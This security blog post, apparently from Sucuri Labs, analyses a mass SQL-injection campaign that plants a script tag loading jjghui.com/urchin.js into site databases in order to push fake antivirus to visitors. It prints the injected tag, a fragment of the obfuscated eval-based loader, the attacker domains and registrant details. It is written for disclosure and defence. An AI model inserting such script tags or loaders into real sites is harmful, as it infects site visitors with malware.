Mass infections from jjghui.com/urchin.js (SQL injection)

We are seeing many sites compromised with malware from jjghui.com/urchin.js. Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection).

According to Google, almost 1.5k sites have been blacklisted already due to it, and there are 80k+ pages on Google index with a JavaScript malware pointing to it.

What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:

Technical Contact:
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
us

This leads us to believe the same group is involved on this one as well.

Compromised sites

On all the compromised sites we analyzed, the following JavaScript was added to the database:

<script src = http://jjghui.com/urchin.js ></script>

When loaded, this loads another piece of encoded javascript:

var str=["70124", "70124", "70217", "70225", "70209"..
&#46&#46
 temp= temp+String&#46fromCharCode(gg); 
 } 
 eval  ( temp );

After decoded it tries to contact http://www3.strongdefenseiz.in/ (and other domains) to push fake AV’s to the person visiting the site.

Infected sites

Any site that is compromised has to remove the infection from the database and audit their code to make sure it is free from SQL injections.

You can scan the site here to make sure it is clean (or not): http://sitecheck.sucuri.net or sign up here to get it cleaned: http://sucuri.net/signup.

We will post more updates as we go.

*Our global page lists the malware-related attack domains for the month: http://sucuri.net/global

Update: New domain name: http://nbnjkl.com/urchin.js

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.